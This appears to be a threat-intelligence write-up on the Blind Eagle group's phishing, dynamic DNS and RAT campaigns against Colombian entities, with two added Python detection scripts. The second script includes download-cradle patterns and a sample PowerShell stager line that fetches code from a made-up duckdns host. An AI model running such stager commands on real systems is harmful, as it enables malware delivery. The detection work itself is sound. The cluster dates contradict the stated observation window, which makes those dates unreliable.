Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infrastructure

Between May 2024 and July 2025, cybersecurity researchers identified five distinct activity clusters associated with the persistent threat actor known as Blind Eagle. These campaigns primarily targeted various levels of the Colombian government, including local, municipal, and federal entities. Recorded Future’s Insikt Group, which tracks this activity under the designation TAG-144, noted that while these clusters share similar tactics, techniques, and procedures (TTPs), they exhibit significant differences in infrastructure, malware deployment, and operational methods.

Background on Blind Eagle

Active since at least 2018, Blind Eagle has a history of targeting organizations across South America, particularly in Colombia, Ecuador, Chile, and Panama. Their operations reflect a dual motivation encompassing both cyber espionage and financial gain. Recent campaigns have demonstrated this duality by incorporating banking-related keylogging and browser monitoring alongside attacks on government entities using various remote access trojans (RATs).

Targeted Sectors and Geographical Focus

Blind Eagle’s attacks have been directed at a diverse range of sectors, including:

– Judiciary and tax authorities
– Financial institutions
– Petroleum and energy companies
– Educational organizations
– Healthcare providers
– Manufacturing firms
– Professional services

While the primary focus remains on Colombia, there have been instances of targeting in Ecuador, Chile, Panama, and even Spanish-speaking users in North America.

Attack Methodology

Blind Eagle employs spear-phishing campaigns that impersonate local government agencies to lure recipients into opening malicious documents or clicking links concealed behind URL shorteners such as cort[.]as, acortaurl[.]com, and gtly[.]to. The messages are sent from compromised email accounts, and the attacker-controlled infrastructure is geofenced: requests that originate outside Colombia or Ecuador are redirected to the official website of the impersonated government agency, so that sandboxes, scanners, and analysts outside the target region never see the payload.

Infrastructure and Tools

The group’s command-and-control (C2) infrastructure often combines IP addresses from Colombian ISPs with virtual private servers (VPS) from providers such as Proton666 and VPN services including Powerhouse Management, FrootVPN, and TorGuard. C2 hostnames are frequently registered through dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com, which lets the operators re-point a hostname to a new address without changing the malware configuration.

Blind Eagle also stages payloads on legitimate internet services, including Bitbucket, Discord, Dropbox, GitHub, Google Drive, the Internet Archive, lovestoblog.com, Paste.ee, Tagbox, and lesser-known Brazilian image-hosting websites. Because traffic to these domains is common in most networks and the services are rarely blocked, the downloads blend in with ordinary use and are unlikely to be flagged on destination alone.
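The shorteners, dynamic DNS providers, and staging services named above can be turned into a simple destination-matching check over proxy logs. The following is an added example written for this page, not code from Recorded Future or from the report; the log lines are constructed, the hostnames used for Discord, Dropbox, GitHub, Google Drive, and the Internet Archive are my own mapping of the service names to domains, and the severity split (shorteners and dynamic DNS are high-signal, legitimate staging services are recorded only as context) is an analyst judgement rather than anything the report states.

```python
"""Match proxy-log destinations against the infrastructure indicators from the article.

Added example for this page; not from Recorded Future, Insikt Group or the report.
Log lines are constructed. Service-name-to-domain mappings are assumptions.
"""
from __future__ import annotations

from typing import Optional
from urllib.parse import urlsplit

# Indicators named in the article, with the defanged "[.]" written as ".".
URL_SHORTENERS = {"cort.as", "acortaurl.com", "gtly.to"}
DYNAMIC_DNS = {"duckdns.org", "ip-ddns.com", "noip.com"}

# Legitimate services the article lists as payload hosts. Assumed domains for the
# service names. Too common to alert on alone, so they are low-severity context.
STAGING_SERVICES = {
    "bitbucket.org", "discord.com", "discordapp.com", "dropbox.com",
    "github.com", "drive.google.com", "archive.org", "lovestoblog.com", "paste.ee",
}


def host_of(target: str) -> str:
    """Return the lowercase hostname from a URL or a bare host, dropping any port."""
    if "://" not in target:
        target = "//" + target  # let urlsplit treat a bare host as a netloc
    return (urlsplit(target).hostname or "").lower().rstrip(".")


def match_indicator(host: str, indicators: set[str]) -> Optional[str]:
    """Return the indicator that equals the host or is its parent domain.

    Subdomain matching is required because dynamic DNS clients are always
    registered as <label>.duckdns.org and similar, never as the apex itself.
    """
    for domain in indicators:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def classify(target: str) -> Optional[tuple[str, str]]:
    """Classify a destination as (severity, reason) or None when nothing matches."""
    host = host_of(target)
    hit = match_indicator(host, URL_SHORTENERS)
    if hit:
        return ("high", f"url-shortener:{hit}")
    hit = match_indicator(host, DYNAMIC_DNS)
    if hit:
        return ("high", f"dynamic-dns:{hit}")
    hit = match_indicator(host, STAGING_SERVICES)
    if hit:
        return ("low", f"staging-service:{hit}")
    return None


# Constructed proxy log: "<timestamp> <client> <method> <url> <status>".
# Lines 1 and 2 model the geofenced pattern from the article: a shortener answers
# with a redirect and the client lands on a legitimate site (placeholder domain).
SAMPLE_PROXY_LOG = """\
2025-03-04T09:12:01Z 10.20.1.17 GET https://cort.as/7xq 302
2025-03-04T09:12:02Z 10.20.1.17 GET https://www.official-site.example/ 200
2025-03-04T09:12:40Z 10.20.1.17 GET http://actualizacion-fiscal.duckdns.org:8080/inj.txt 200
2025-03-04T09:13:02Z 10.20.1.22 GET https://paste.ee/r/abcd 200
2025-03-04T09:14:11Z 10.20.1.22 GET https://www.example.com/ 200
"""


def scan_proxy_log(text: str) -> list[dict]:
    """Return one finding per log line whose destination matches an indicator."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines instead of aborting the scan
        ts, src, _method, url, _status = parts
        verdict = classify(url)
        if verdict is not None:
            severity, reason = verdict
            findings.append({"time": ts, "src": src, "url": url,
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{f['severity']:<4} {f['src']:<12} {f['reason']:<28} {f['url']}")
```

A shortener hit followed within seconds by a request to an unrelated legitimate site, as in the first two constructed lines, is exactly what the geofencing described above produces for a client outside the target region; the high-severity entries are the ones worth pivoting on, while the staging-service entries are best used to enrich an alert that already exists.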

Malware Deployment

Recent campaigns have employed Visual Basic Script files as droppers to execute dynamically generated PowerShell scripts at runtime. These scripts reach out to external servers to download injector modules responsible for loading various RATs, such as Lime RAT, DCRat, AsyncRAT, or Remcos RAT.
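The chain described above (a script host runs a VBS dropper, which launches PowerShell, which fetches the injector) is visible in process-creation telemetry as PowerShell with a script-host parent and a download cradle in its command line. The following is an added example for this page, not code from the report or from the actor, that scores constructed Sysmon-style process-creation records for that pattern. The event shape, the parent/child names, the cradle and evasion strings, and the use of an encoded command are assumptions about how such a chain commonly appears, not details quoted from the report.

```python
"""Score process-creation events for the VBS -> PowerShell -> download chain.

Added example for this page; not from Recorded Future, Insikt Group or the report.
Events are constructed in a simplified Sysmon Event ID 1 shape.
"""
from __future__ import annotations

import base64
import re
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # hosts that run a .vbs dropper
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-and-execute strings typical of PowerShell stagers (assumed, not quoted).
CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|\bcurl\b|"
    r"\bwget\b|Net\.WebClient|Invoke-Expression|\biex\b|"
    r"\[Reflection\.Assembly\]::Load|FromBase64String",
    re.I,
)
# Switches that hide the window or disable profile/execution-policy checks.
EVASION = re.compile(
    r"-(?:w|win|window|windowstyle)\s+hidden|-(?:nop|noprofile)\b|"
    r"-(?:ep|exec|executionpolicy)\s+bypass",
    re.I,
)
# -EncodedCommand and its accepted prefixes; the argument is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; treat as not encoded


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Each independent signal adds one point."""
    reasons: list[str] = []
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return 0, reasons
    parent = basename(ev.get("ParentImage", ""))
    if parent in SCRIPT_HOSTS:
        reasons.append(f"powershell spawned by script host {parent}")
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command decoded")
    # Inspect both the raw command line and the decoded payload for a cradle.
    hits = sorted({m.group(0).lower() for m in CRADLE.finditer(cmd + " " + (decoded or ""))})
    if hits:
        reasons.append("download/execution cradle: " + ", ".join(hits))
    if EVASION.search(cmd):
        reasons.append("evasion switches")
    return len(reasons), reasons


def triage(events: list[dict], threshold: int = 2) -> list[dict]:
    """Return events scoring at or above threshold, with their reasons."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return out


# Constructed stage-2 command; the hostname is a made-up dynamic DNS label.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://updates-fiscal.duckdns.org/inj.txt')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    {"ProcessId": 4388, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ProcessId": 5016, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "CommandLine": 'powershell -w hidden -c "IEX (iwr http://files.example/inj.txt)"'},
    {"ProcessId": 5200, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], hit["score"], "; ".join(hit["reasons"]))
```

Scoring several weak signals rather than matching a single string keeps the administrator's `-File` invocation out of the results while catching both the encoded and the plain-text form of the stager; decoding `-EncodedCommand` before matching matters because the cradle strings are otherwise invisible in the raw command line.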

Activity Clusters

Recorded Future’s analysis identified five clusters of activity. Note that the date ranges given below for clusters 4 and 5 fall before the May 2024 start of the observation window stated at the top of this article, so the two cannot both be read as written:

1. Cluster 1 (February – July 2025): Targeted Colombian government entities exclusively, deploying DCRat, AsyncRAT, and Remcos RAT.

2. Cluster 2 (September – December 2024): Targeted Colombian government and private sector entities, utilizing similar malware.

3. Cluster 3 (May – August 2024): Focused on financial institutions in Colombia, deploying banking-related keyloggers and browser monitoring tools.

4. Cluster 4 (January – April 2024): Targeted energy and petroleum sectors in Colombia and Ecuador, using customized RATs.

5. Cluster 5 (September – December 2023): Aimed at healthcare and educational institutions in Colombia, employing a combination of phishing lures and RATs.

Conclusion

Blind Eagle’s continued reliance on well-established methods, namely spear-phishing, commodity RATs, dynamic DNS, and legitimate hosting services, shows that these tactics remain effective in the region. The group’s ability to vary its infrastructure and delivery chains while keeping a narrow geographic and sectoral focus makes it a persistent threat to Colombian public-sector and financial organizations.